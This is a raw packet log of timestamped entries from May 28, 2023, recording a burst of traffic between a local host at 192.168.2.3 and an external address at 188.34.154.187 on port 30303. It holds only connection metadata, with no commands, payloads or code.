May 28, 2023 10:46:23.235009909 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.235033989 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.235043049 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.235068083 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.235079050 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.235088110 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.235088110 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.235109091 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.235116959 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.235156059 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.235215902 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.235243082 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.235260963 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.235263109 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.235292912 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.235300064 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.235307932 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.235337973 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.235358000 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.235364914 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.235378027 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.235385895 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.235399008 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.235399008 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.235419989 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.235424042 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.235440969 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.235445976 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.235466957 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.235476017 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.235485077 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.235496044 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.235518932 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.235543966 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.256357908 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.256377935 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.256436110 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.256519079 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.256522894 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.256519079 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.256542921 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.256563902 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.256576061 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.256583929 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.256602049 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.256603003 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.256620884 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.256639957 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.256655931 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.256665945 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.256685972 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.256712914 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.256716967 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.256736994 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.256750107 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.256761074 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.256791115 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.256795883 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.256851912 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.256861925 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.256906033 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.256907940 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.256930113 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.256947994 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.256956100 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.256974936 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.256987095 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.257006884 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.257020950 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.257036924 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.257041931 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.257075071 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.257075071 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.257108927 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.257128954 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.257436037 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.257456064 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.257477045 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.257493019 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.257498026 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.257519960 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.257529974 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.257529974 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.257543087 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.257550001 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.257575989 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.257594109 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.257599115 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.257635117 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.257652998 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.257654905 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.257677078 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.257685900 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.257704020 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.257724047 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.257745028 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.257766008 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.257802963 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.257910967 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.257931948 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.257951975 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.257952929 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.257966042 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.257973909 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.257977962 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.257994890 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258002043 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258017063 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258028984 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258038044 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258049011 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258059025 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258070946 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258080959 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258085012 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258101940 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258112907 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258124113 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258133888 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258145094 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258156061 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258167028 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258178949 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258187056 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258189917 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258208036 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258218050 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258230925 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258241892 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258251905 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258270025 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258271933 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258294106 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258301973 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258301973 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258313894 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258332014 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258335114 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258346081 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258357048 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258368969 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258379936 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258387089 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258404016 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258409023 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258423090 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258431911 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258446932 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258455992 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258470058 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258479118 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258491039 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258507967 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258513927 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258523941 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258534908 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258555889 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258569002 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258570910 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258570910 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258589983 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258610964 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258610964 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258641958 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258651972 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258662939 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258673906 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258682013 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258699894 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258701086 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258721113 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258721113 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258739948 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258758068 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258759022 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258775949 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258779049 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258800030 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258801937 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258820057 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258830070 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258840084 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258846045 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258858919 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258867025 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258879900 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258888960 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258899927 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258908987 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258919954 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258930922 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258940935 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258949041 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258960962 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258964062 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.258980036 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.258987904 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259001017 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259010077 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259020090 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259027004 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259040117 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259048939 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259061098 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259092093 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259092093 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259094000 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259107113 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259114981 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259135008 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259143114 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259159088 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259162903 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259179115 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259179115 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259197950 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259202003 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259218931 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259224892 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259236097 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259255886 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259258986 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259268045 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259274960 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259289026 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259308100 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259309053 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259325027 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259327888 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259349108 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259352922 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259367943 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259377003 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259387016 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259397984 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259406090 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259414911 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259426117 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259447098 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259465933 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259473085 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259485960 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259488106 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259516001 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259526968 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259532928 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259548903 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259568930 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259577036 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259591103 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259598970 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259613991 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259622097 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259635925 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259639025 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259659052 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259680986 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259687901 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259687901 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259701967 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259711027 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259722948 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259737015 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259744883 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259749889 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259768009 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259772062 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259797096 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259800911 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259814024 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259821892 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259844065 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259846926 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259865999 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259871006 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259886980 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259890079 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259912014 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259917021 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259938002 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259958029 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259957075 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259973049 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259979963 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.259988070 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.259999990 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260021925 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260031939 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260031939 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260042906 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260046959 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260065079 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260071993 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260086060 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260092020 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260107040 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260114908 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260128975 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260134935 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260150909 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260152102 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260173082 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260175943 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260194063 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260194063 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260216951 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260237932 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260251999 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260282993 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260282993 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260287046 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260302067 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260324955 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260327101 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260345936 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260353088 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260368109 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260389090 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260394096 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260410070 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260420084 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260420084 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260432959 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260438919 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260454893 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260463953 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260476112 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260478020 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260499001 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260503054 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260519981 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260525942 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260543108 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260545015 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260564089 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260585070 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260593891 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260593891 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260607004 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260613918 CEST	49685	30303	192.168.2.3	188.34.154.187
